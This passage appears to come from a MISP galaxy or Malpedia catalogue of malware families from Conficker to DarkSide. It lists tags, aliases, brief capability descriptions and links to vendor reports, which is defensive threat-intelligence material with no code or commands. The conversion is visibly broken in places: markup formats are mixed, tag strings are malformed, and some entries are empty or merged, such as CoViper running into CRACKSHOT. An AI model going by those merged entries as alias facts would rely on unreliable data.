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<td><a href="https://github.com/tillmannw/cnfckr">https://github.com/tillmannw/cnfckr</a></td>
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<tr>
<td><a href="http://contagiodump.blogspot.com/2009/05/win32conficker.html">http://contagiodump.blogspot.com/2009/05/win32conficker.html</a></td>
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Confucius

The tag is: misp-galaxy:malpedia="Confucius"

Confucius is also known as:

Table 1546. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius">https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius</a></td>
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<tr>
<td><a href="https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat">https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat</a></td>
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Conti Ransomware

The tag is: misp-galaxy:malpedia="Conti Ransomware"

Conti Ransomware is also known as:

Table 1547. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.conti">Malpedia</a></td>
</tr>
<tr>
<td><a href="https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/">Sophos News</a></td>
</tr>
<tr>
<td><a href="http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/">Chuongdong reverse engineering</a></td>
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<tr>
<td><a href="https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/">Sophos News</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">Cronup Post</a></td>
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<td><a href="https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/">Sophos News</a></td>
</tr>
<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">Crowdstrike Report</a></td>
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<tr>
<td><a href="https://www.carbonblack.com/blog/wizard-spider-adversary-update/">Carbonblack Blog</a></td>
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<tr>
<td><a href="https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/">Kela Report</a></td>
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<td><a href="https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/">Intel471 Blog</a></td>
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<td><a href="https://twitter.com/AltShiftPrtScn/status/1350755169965924352">Twitter</a></td>
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<td><a href="https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf">PwC PDF</a></td>
</tr>
<tr>
<td><a href="https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf">Clearskysec PDF</a></td>
</tr>
</tbody>
</table>
Contopee

FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.

The tag is: \texttt{misp-galaxy:malpedia=\textasciitilde Contopee}\n
Contopee is also known as:

- \texttt{WHITEOUT}

\textit{Table 1548. Table References}

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee">https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee</a></td>
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<tr>
<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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CookieBag

The tag is: \texttt{misp-galaxy:malpedia=\textasciitilde CookieBag}\n
CookieBag is also known as:

\textit{Table 1549. Table References}

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag">https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag</a></td>
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Corebot

The tag is: \texttt{misp-galaxy:malpedia=\textasciitilde Corebot}\n
Corebot is also known as:

\textit{Table 1550. Table References}

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot">https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot</a></td>
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CoreDN

The tag is: misp-galaxy:malpedia="CoreDN"

CoreDN is also known as:

Table 1551. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn">https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn</a></td>
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<td><a href="https://blog.alyac.co.kr/2105">https://blog.alyac.co.kr/2105</a></td>
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Coreshell

The tag is: misp-galaxy:malpedia="Coreshell"

Coreshell is also known as:

- SOURFACE

Table 1552. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell">https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell</a></td>
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<td><a href="http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf">http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf</a></td>
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<td><a href="https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/">https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/</a></td>
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<tr>
<td><a href="https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html">https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html</a></td>
</tr>
<tr>
<td><a href="http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html">http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html</a></td>
</tr>
</tbody>
</table>

CoronaVirus Ransomware

The tag is: misp-galaxy:malpedia="CoronaVirus Ransomware"

CoronaVirus Ransomware is also known as:
- CoronaVirus Cover-Ransomware

**Table 1553. Table References**

<table>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/03/coronavirus-ransomware.html">https://id-ransomware.blogspot.com/2020/03/coronavirus-ransomware.html</a></td>
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**Cotx RAT**

The tag is: *misp-galaxy:malpedia="Cotx RAT"*

Cotx RAT is also known as:

**Table 1554. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx">https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=1WfPlgtfWNQ">https://www.youtube.com/watch?v=1WfPlgtfWNQ</a></td>
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</table>

**Covicli**

The tag is: *misp-galaxy:malpedia="Covicli"*

Covicli is also known as:

- Covically

**Table 1555. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli">https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli</a></td>
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</table>

**CoViper**

The tag is: *misp-galaxy:malpedia="CoViper"*

CoViper is also known as:
**crackshot**

CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.

The tag is: *misp-galaxy:malpedia*="crackshot"

**CradleCore**

The tag is: *misp-galaxy:malpedia*="CradleCore"

**CRAT**

According to Cisco Talos, CRAT is a remote access trojan with plugin capabilities, used by Lazarus since at least May 2020.

The tag is: *misp-galaxy:malpedia*="CRAT"
CREAMSICLE

The tag is: `misp-galaxy:malpedia=~"CREAMSICLE~"

CREAMSICLE is also known as:

Table 1560. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle">https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle</a></td>
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<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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Credraptor

The tag is: `misp-galaxy:malpedia=~"Credraptor~"

Credraptor is also known as:

Table 1561. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor">https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor</a></td>
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Crenufs

The tag is: `misp-galaxy:malpedia=~"Crenufs~"

Crenufs is also known as:

Table 1562. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs">https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs</a></td>
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Crimson RAT

The tag is: `misp-galaxy:malpedia=~"Crimson RAT~"

Crimson RAT is also known as:

- SEEDOOR
CrimsonIAS

According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable as it listens for incoming connections only; making it different from typical Windows backdoors that beacons out.

The tag is: misp-galaxy:malpedia="CrimsonIAS"

CrimsonIAS is also known as:

Table 1564. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.crimsonias">https://malpedia.caad.fkie.fraunhofer.de/details/win.crimsonias</a></td>
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<tr>
<td><a href="https://threatconnect.com/blog/crimsonias-listening-for-an-3v1l-user/">https://threatconnect.com/blog/crimsonias-listening-for-an-3v1l-user/</a></td>
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Cring Ransomware

The tag is: `misp-galaxy:malpedia="Cring Ransomware"`

Cring Ransomware is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cring">https://malpedia.caad.fkie.fraunhofer.de/details/win.cring</a></td>
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</table>

CROSSWALK

According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.

The tag is: `misp-galaxy:malpedia="CROSSWALK"`

CROSSWALK is also known as:

- Motnug
- ProxIP

Table 1566. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk">https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk</a></td>
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<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
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<td><a href="https://www.youtube.com/watch?v=8x-pGlWpiYI">https://www.youtube.com/watch?v=8x-pGlWpiYI</a></td>
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<td><a href="https://content.fireeye.com/apt-41/rpt/apt41/">https://content.fireeye.com/apt-41/rpt/apt41/</a></td>
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<td><a href="https://twitter.com/MrDanPerez/status/1159459082534825986">https://twitter.com/MrDanPerez/status/1159459082534825986</a></td>
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Crutch

The tag is: `misp-galaxy:malpedia="Crutch"`
Crutch is also known as:

Table 1567. Table References

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<td><a href="https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/">https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/</a></td>
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Cryakl

The tag is: misp-galaxy:malpedia="Cryakl"

Cryakl is also known as:

- CryLock

Table 1568. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl">https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl</a></td>
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<td><a href="https://hackmag.com/security/ransomware-russian-style/">https://hackmag.com/security/ransomware-russian-style/</a></td>
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<td><a href="https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/">https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/</a></td>
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<td><a href="https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html">https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html</a></td>
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<td><a href="https://twitter.com/demonslay335/status/971164798376468481">https://twitter.com/demonslay335/status/971164798376468481</a></td>
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CryLocker

The tag is: misp-galaxy:malpedia="CryLocker"

CryLocker is also known as:

Table 1569. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker</a></td>
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CrypMic

The tag is: misp-galaxy:malpedia="CrypMic"

CrypMic is also known as:

Table 1570. Table References

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Crypt0l0cker

The tag is: misp-galaxy:malpedia="Crypt0l0cker"

Crypt0l0cker is also known as:

Table 1571. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker">https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker</a></td>
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<tr>
<td><a href="http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html">http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html</a></td>
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</tbody>
</table>

CryptBot

A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.

The tag is: misp-galaxy:malpedia="CryptBot"

CryptBot is also known as:

Table 1572. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot</a></td>
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<tr>
<td><a href="https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger">https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger</a></td>
</tr>
</tbody>
</table>

CrypticConvo

CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to PaloaltoNetworks CrypticConvo and several
additional trojans are believed to be included in a meta framework used by the "Scarlet Mimic" threat actor in order to quickly evade AV systems.

The tag is: *misp-galaxy:malpedia="CrypticConvo"

CrypticConvo is also known as:

Table 1573. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo">https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/">https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></td>
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**CryptoDarkRubix**

The tag is: *misp-galaxy:malpedia="CryptoDarkRubix"

CryptoDarkRubix is also known as:

- Ranet

Table 1574. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptodarkrubix">https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptodarkrubix</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/03/cryptodarkrubix-ransomware.html">https://id-ransomware.blogspot.com/2020/03/cryptodarkrubix-ransomware.html</a></td>
</tr>
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</table>

**CryptoLocker**

CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.

The tag is: *misp-galaxy:malpedia="Crypto Locker"

CryptoLocker is also known as:

Table 1575. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker</a></td>
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<tr>
<td><a href="https://sites.temple.edu/care/ci-rw-attacks/">https://sites.temple.edu/care/ci-rw-attacks/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-evergreen">https://www.secureworks.com/research/threat-profiles/gold-evergreen</a></td>
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CryptoLuck

The tag is: *misp-galaxy:malpedia*="CryptoLuck"

CryptoLuck is also known as:

**Table 1576. Table References**

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CryptoMix

A variant of CryptoMix is win.clop.

The tag is: *misp-galaxy:malpedia*="CryptoMix"

CryptoMix is also known as:

- CryptFile2

**Table 1577. Table References**

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<th>Links</th>
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CryptoPatronum

CryptoPatronum is a ransomware that encrypts user data through AES-256 (CBC) and it asks for BTC / ETH in order to get back the original files. In the ransom note there is not a title but only a reference to crsss.exe: its original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension.

The tag is: *misp-galaxy:malpedia*="CryptoPatronum"

CryptoPatronum is also known as:
Cryptorium

The tag is: misp-galaxy:malpedia="Cryptorium"

Cryptorium is also known as:

CryptoShield

The tag is: misp-galaxy:malpedia="CryptoShield"

CryptoShield is also known as:

CryptoShuffler

The tag is: misp-galaxy:malpedia="CryptoShuffler"

CryptoShuffler is also known as:
Cryptowall

The tag is: *misp-galaxy:malpedia=*Cryptowall*

Cryptowall is also known as:

*Table 1582. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall">https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall</a></td>
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<td><a href="https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f">https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f</a></td>
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<tr>
<td><a href="https://sites.temple.edu/care/ci-rw-attacks/">https://sites.temple.edu/care/ci-rw-attacks/</a></td>
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CryptoWire

The tag is: *misp-galaxy:malpedia=*CryptoWire*

CryptoWire is also known as:

*Table 1583. Table References*

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CryptoFortress

The tag is: *misp-galaxy:malpedia=*CryptoFortress*

CryptoFortress is also known as:

*Table 1584. Table References*

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<td><a href="https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/">https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/</a></td>
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<tr>
<td><a href="http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html">http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html</a></td>
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CryptoRansomeware

The tag is: *misp-galaxy:malpedia=*CryptoRansomeware*

CryptoRansomeware is also known as:
CryptXXX

The tag is: misp-galaxy:malpedia="CryptXXX"

CryptXXX is also known as:

CsExt

The tag is: misp-galaxy:malpedia="CsExt"

CsExt is also known as:

CTB Locker

The tag is: misp-galaxy:malpedia="CTB Locker"

CTB Locker is also known as:
Cuba Ransomware

The tag is: misp-galaxy:malpedia="Cuba Ransomware"

Cuba Ransomware is also known as:

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<td><a href="https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html">https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html</a></td>
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Cuegoe

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe">https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></td>
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<td><a href="http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html">http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html</a></td>
</tr>
<tr>
<td><a href="https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal">https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal</a></td>
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Cueisfry

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry">https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry</a></td>
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Cursed Murderer Ransomware

The tag is: misp-galaxy:malpedia="Cursed Murderer Ransomware"

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https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer
https://id-ransomware.blogspot.com/2020/01/thecursedmurderer-ransomware.html

Cutlet

The tag is: `misp-galaxy:malpedia="Cutlet"`

Cutlet is also known as:

Table 1593. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet">https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet</a></td>
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<td><a href="https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html">https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html</a></td>
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Cutwail

The tag is: `misp-galaxy:malpedia="Cutwail"`

Cutwail is also known as:

Table 1594. Table References

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<td><a href="http://www.secureworks.com/research/threat-profiles/gold-essex">http://www.secureworks.com/research/threat-profiles/gold-essex</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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<tr>
<td><a href="https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt">https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt</a></td>
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<td><a href="https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/">https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-essex">https://www.secureworks.com/research/threat-profiles/gold-essex</a></td>
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CyberGate

The tag is: misp-galaxy:malpedia="CyberGate"

CyberGate is also known as:

- Rebhip

Table 1595. Table References

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<td><a href="https://blog.reversinglabs.com/blog/rats-in-the-library">https://blog.reversinglabs.com/blog/rats-in-the-library</a></td>
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<td><a href="https://citizenlab.ca/2015/12/packrat-report/">https://citizenlab.ca/2015/12/packrat-report/</a></td>
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CyberSplitter

The tag is: misp-galaxy:malpedia="CyberSplitter"

CyberSplitter is also known as:

Table 1596. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter">https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter</a></td>
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CycBot

The tag is: misp-galaxy:malpedia="CycBot"

CycBot is also known as:

Table 1597. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot</a></td>
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<td><a href="https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/">https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/</a></td>
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Cyrat Ransomware

The tag is: misp-galaxy:malpedia="Cyrat Ransomware"

Cyrat Ransomware is also known as:

Table 1598. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat">https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat</a></td>
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<tr>
<td><a href="https://www.gdatasoftware.com/blog/cyrat-ransomware">https://www.gdatasoftware.com/blog/cyrat-ransomware</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html">https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html</a></td>
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cysxl

The tag is: misp-galaxy:malpedia="cysxl"

cysxl is also known as:

Table 1599. Table References

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Dacls (Windows)

The tag is: misp-galaxy:malpedia="Dacls (Windows)"

Dacls (Windows) is also known as:

Table 1600. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls">https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls</a></td>
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<td><a href="https://blog.netlab.360.com/dacls-the-dual-platform-rat/">https://blog.netlab.360.com/dacls-the-dual-platform-rat/</a></td>
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<td><a href="https://www.sygnia.co/mata-framework">https://www.sygnia.co/mata-framework</a></td>
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<td><a href="https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/">https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/</a></td>
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</tbody>
</table>
**DADJOKE**

DADJOKE was discovered as being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro using multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality, made to look like a PNG file. Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019, DADJOKE is attributed with medium confidence to APT40.

The tag is: misp-galaxy:malpedia="DADJOKE"

DADJOKE is also known as:

*Table 1601. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke">https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke</a></td>
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<td><a href="https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9">https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9</a></td>
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<td><a href="https://twitter.com/ClearskySec/status/1110941178231484417">https://twitter.com/ClearskySec/status/1110941178231484417</a></td>
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<td><a href="https://www.youtube.com/watch?v=vx9IB88wXSE">https://www.youtube.com/watch?v=vx9IB88wXSE</a></td>
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<td><a href="https://prezi.com/view/jGyAzyy5dT0kDrtwsJi5/">https://prezi.com/view/jGyAzyy5dT0kDrtwsJi5/</a></td>
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<td><a href="https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts">https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts</a></td>
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**DADSTACHE**

The tag is: misp-galaxy:malpedia="DADSTACHE"

DADSTACHE is also known as:

*Table 1602. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache">https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache</a></td>
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<td><a href="https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a">https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a</a></td>
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<tr>
<td><a href="https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign">https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign</a></td>
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<td><a href="https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html">https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html</a></td>
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<tr>
<td><a href="https://twitter.com/killamjr/status/1204584085395517440">https://twitter.com/killamjr/status/1204584085395517440</a></td>
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Dairy

The tag is: `misp-galaxy:malpedia="Dairy"`

Dairy is also known as:

Table 1603. Table References

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</tbody>
</table>

DanaBot

Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.

The tag is: `misp-galaxy:malpedia="DanaBot"`

DanaBot is also known as:

Table 1604. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot">https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot</a></td>
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<td><a href="https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/">https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/</a></td>
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<td><a href="https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github">https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github</a></td>
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<td><a href="https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html">https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html</a></td>
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<td><a href="https://asert.arbornetworks.com/danabots-travels-a-global-perspective/">https://asert.arbornetworks.com/danabots-travels-a-global-perspective/</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<tr>
<td><a href="https://malwareandstuff.com/deobfuscating-danabots-api-hashing/">https://malwareandstuff.com/deobfuscating-danabots-api-hashing/</a></td>
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<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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**danbot**

The tag is: *misp-galaxy:malpedia=*danbot*

danbot is also known as:

*Table 1605. Table References*

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<td><a href="https://otx.alienvault.com/pulse/5d4301ed3bf3406ac01acc0f">https://otx.alienvault.com/pulse/5d4301ed3bf3406ac01acc0f</a></td>
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<td><a href="https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/">https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/</a></td>
</tr>
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</table>

**DarkComet**

DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.

The tag is: *misp-galaxy:malpedia=*DarkComet*

DarkComet is also known as:

- Breut
- Fynloski
- klovbot

Table 1606. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet">https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet</a></td>
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<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html">https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html</a></td>
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<td><a href="https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage">https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage</a></td>
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<td><a href="http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html">http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html</a></td>
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<td><a href="https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/">https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/</a></td>
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<td><a href="https://www.tgsoft.it/files/report/download.asp?id=7481257469">https://www.tgsoft.it/files/report/download.asp?id=7481257469</a></td>
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<td><a href="https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/">https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/</a></td>
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DarkMegi

The tag is: *misp-galaxy:malpedia*="DarkMegi"

DarkMegi is also known as:

Table 1607. Table References

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<td><a href="http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html">http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html</a></td>
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Darkmoon

The tag is: *misp-galaxy:malpedia*="Darkmoon"

Darkmoon is also known as:

- Chymine

Table 1608. Table References
**DarkPulsar**

The tag is: *misp-galaxy:malpedia="DarkPulsar"*

DarkPulsar is also known as:

*Table 1609. Table References*

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**DarkRat**

The tag is: *misp-galaxy:malpedia="DarkRat"*

DarkRat is also known as:

*Table 1610. Table References*

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**DarkShell**

DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.

The tag is: *misp-galaxy:malpedia="DarkShell"*

DarkShell is also known as:

*Table 1611. Table References*

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DarkSide

The tag is: misp-galaxy:malpedia="DarkSide"

DarkSide is also known as:

Table 1612. Table References

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<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
